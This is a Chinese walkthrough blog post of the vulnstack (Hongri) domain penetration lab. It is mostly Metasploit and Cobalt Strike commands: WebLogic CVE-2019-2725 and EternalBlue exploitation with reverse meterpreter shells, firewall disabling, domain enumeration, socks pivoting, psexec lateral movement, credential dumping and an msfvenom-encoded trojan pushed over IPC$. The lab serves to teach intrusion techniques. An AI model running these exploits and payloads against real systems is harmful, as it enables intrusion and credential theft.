文章目录

  • 1. 环境说明
  • 2. 开启靶场
  • 3. 外网渗透
    • 3.1 端口扫描
    • 3.2 拿shell
      • 3.2.1 CVE-2019-2725
      • 3.2.2 MSF17-010
    • 3.3 提权
  • 4. 内网渗透
    • 4.1 信息收集
    • 4.2 设置代理
    • 4.3 横向移动
  • 5. cs横向探测


红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。
关于靶场统一登录密码:1qaz@WSX

1. 环境说明

内网网段:10.10.10.1/24

DMZ网段:192.168.111.1/24

测试机地址:192.168.111.1(Windows),192.168.111.11(Linux)

防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):

deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24

网卡配置
只需要在VM上选择对应网卡即可,不需要在靶机中进行配置。

DC

IP:10.10.10.10 (VMnet2)
OS:Windows 2012(x64)

WEB

IP1:192.168.111.80 (VMnet0)
IP2:10.10.10.80 (VMnet2)
OS:Windows 2008(x64)

PC

IP1:192.168.111.201 (VMnet0)
IP2:10.10.10.201 (VMnet2)
OS:Windows 7(x86)

2. 开启靶场

WEB机登录成功后需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,管理员身份依次运行,管理员账号密码:Administrator/1qaz@WSX

3. 外网渗透

3.1 端口扫描

通过端口扫描我们发现Web服务器开启了80、7001等端口,其他端口如445、1433、3389等也可以使用一些RCE漏洞或弱口令直接进入Web服务器。这里我们先访问Web服务,发现80端口页面是空白的

3.2 拿shell

3.2.1 CVE-2019-2725

在7001端口我们发现Web服务器开启了Weblogic,尝试使用WeblogicScan脚本探测漏洞:

随便选一个尝试利用,这里使用cve-2019-2725

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set target Windows
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.111.80
set lhost 192.168.111.128
run

还有其他cve漏洞,大家可以尝试

3.2.2 MSF17-010

fscan扫描发现ms17-010可以尝试利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.111.80
run

也可以成功获取shell

不是system权限,需要提权

3.3 提权

使用cs创建一个监听器:

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.111.128 #kali地址
set lport 12345          #监听器监听的端口
set session 2
run


回到cs,发现主机已上线

4. 内网渗透

4.1 信息收集

查看基本信息shell ipconfig /all,发现机器有双网卡,内网 10.10.10.1/24 网段,DNS服务器10.10.10.10,也就是域控
关闭防火墙netsh advfirewall set allprofiles state off
查看有几个域      net view /domain
查看域名            net config workstation
查看域内主机      net view
查询域内用户      net user /domain
查看域管理员      net group "domain admins" /domain
查看域内机器名 net group "domain computers" /domain
内端口扫描       portscan 10.10.10.0/24 445 arp 200

查看基本信息

查看本机机器名:

shell hostname

查看域控

shell net group "domain controllers" /domain

查看域管理员

shell net group "domain admins" /domain

域内机器名

net group "domain computers" /domain

分别ping一下DC和PC,可以解析出主机ip地址

DC 10.10.10.10
PC 10.10.10.201

至此,我们已经初步完成了内网信息收集:

该靶场为域环境:de1ay.com
该靶场存在三台主机:DC(域控)、PC、WEB
该靶场存在两个网段:10.10.10.0/24,192.168.111.0/24
该靶场的域管理员为:Administrator

4.2 设置代理

在对内网进行了初步的信息收集后,我们要开始攻击内网主机了,但是内网中的机器和我们的攻击机并不处于同一网络当中,所以要通过Web服务器建立代理,这里有很多内网穿透工具可以使用,如ew、frp、chisel等,我这里直接使用msf建立路由,并开启socks代理。
使用如下命令查看所控主机网络中的路由信息:

run get_local_subnets

已经清楚了内网机器都是处于10网段的,所有这里添加一条指向10网段的路由

run autoroute -s 10.10.10.0/255.255.255.0

查看路由:

run autoroute -p


在session存在路由了之后,可以使用代理模块

background
use auxiliary/server/socks5
set srvhost 127.0.0.1

msf6中代理模块改为了auxiliary/server/socks_proxy
默认监听端口为1080

接下来通过kali上自带的全局代理软件proxychains来连接socks代理,先修改配置文件

修改端口:vim /etc/proxychains4.conf

代理成功

proxychains4 nc -zv 10.10.10.80 135
proxychains4 nc -zv 10.10.10.201 135


用nmap探测:进一波验证代理成功!

nmap -sT -sV -Pn -n -p22,135,445,139,25,80,110 10.10.10.10

可以ping通域控:

但是没法ping通10.10.10.201,应该是防火墙拦截了ICMP协议

4.3 横向移动

使用msf下的扫描端口模块:

也可以用cs探测端口,内网主机探活+端口扫描

portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024


域控制器DC执行成功,但PC机失败

use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_psexec
set rhosts 10.10.10.10
run

如果是下面这个错误:可参考解决办法

Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

在终端输入 netstat -tulpen,查看进程端口信息。
命令fuser -k 端口号/tcp,删除4444端口进程

获取hash

然后再利用logonpasswords抓取明文:

但我的pc机无法上线cs,可能是环境问题

5. cs横向探测

创建smb

对目标10.10.10.10(DC)进行横向移动
设置psexec


DC成功上线:

我们回到web主机
使用msfvenom生成木马

msfvenom -p windows/meterpreter/bind_tcp lport=443 -f vbs -e x86/shikata_ga_nai -o /tmp/msf.vbs

将生成的木马传到web主机上

进入shell,与PC主机建立IPC$连接:

net use \\10.10.10.201\ipc$ "1qaz@WSX" /user:administrator@de1ay.com

但是我的没法建立连接,就很离谱,估计是环境问题

如果建立成功如下图:

将上传的木马复制到PC机C盘目录下:

copy msf.vbs \\10.10.10.201\c$

PC开启了3389端口,在msf建立监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set stageencoder x86/shikata_ga_nai
set rhosts 10.10.10.201
set lport 443
run

连接PC机的远程桌面,使用域管理员账号登录PC,上线msf:

proxychains4 rdesktop 10.10.10.201:3389

参考:https://blog.csdn.net/kali_Ma/article/details/121180496

内网渗透—红日安全vulnstack(二)相关推荐

  1. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

    靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

  2. 内网渗透—红日靶场三

    文章目录 0x01.环境配置 0x02.Centos getshell 0x03.Centos提权 0x04.内网穿透-设置路由 0x05.内网穿透-设置代理 0x06.获取内网目标shell 通过s ...

  3. vulnstack内网渗透环境靶场-1 大全

    一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...

  4. 内网渗透(五十二)之域控安全和跨域攻击-搭建和查看域信任关系

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  5. 内网渗透(十二)之内网信息收集-内网端口扫描和发现

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  6. 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  7. 内网渗透初探(二) | 重新学习内网渗透全过程

    一.前言 前面写了一篇内网渗透初探(一),写的不是特别好,然后也是在学习内网渗透相关的东西,就将其整理了一下,加了自己的思路,写好这篇内网渗透初探(二)- 二.环境介绍 专门做了个拓扑图,首先外网打点 ...

  8. 内网渗透靶场 Vulnstack(一)

    虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!!! 首先对内网域进行了解一下. 域是计算机网络的一种形式,其中所有用 ...

  9. 内网渗透-实战|手把手教你如何进行内网渗透

    实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当 ...

最新文章

  1. 【译】MVVM Tutorial with ReactiveCocoa: Part 1/2
  2. vsftpd 配置说明
  3. 什么是分布式_终于搞懂分布式锁是什么了
  4. suse linux标准c安装,suse linux安装cmake时ccmake没有安装上的原因
  5. java中什么是 伪共享_【Java】聊聊多线程中的伪共享现象
  6. scp命令不会复制隐藏文件
  7. 微课|玩转Python轻松过二级(2.1.4节):列表、元组、字典、集合概述
  8. PAT甲级1002 多项式相加
  9. count(*) 的实现方式
  10. 给定一个字符串数组,将字母异位词组合在一起。字母异位词指字母相同,但排列不同的字符串。
  11. nachos java_Nachos java版学习(一)
  12. 100行代码搞定Python做OCR识别身份证,文字各种字体!
  13. 高效的睡眠——睡眠革命
  14. html 批量pdf 打印,前端连接打印机批量打印pdf格式的文件
  15. 结节性硬化症会一直病变吗?结节性硬化最晚多大发病?
  16. python正态分布拟合曲线怎么打印出中位数值,如何用对数正态分布函数拟合数据...
  17. HTML入门之常用标签以及框架写法
  18. Google SEO和SEM的不同之处?
  19. HTML 利用 Web Audio API 进行音频可视化
  20. oracle 查询本年12月,Oracle查询1-12月数据

热门文章

  1. 四个人分52张扑克牌,同时拿到红桃A和黑桃A的概率?
  2. 中国式家长怎么继续学计算机,中国式家长怎么学算法 掌握方法是简单事
  3. 以大数据驱动辽宁制造业转型
  4. 独行快、众行远,一场架构师的专场汇
  5. 计算机系统还原后 桌面不显示图标,win10系统启动后桌面没有显示图标和任务栏的还原办法...
  6. 因为前公司一句话错失offer,背调时如何预防前任的负面评价?
  7. PTA:改写二分搜索算法
  8. 【设计模式】单例模式
  9. 统信UOS系统 重置密码
  10. matlab多缝衍射公式,多缝干涉仿真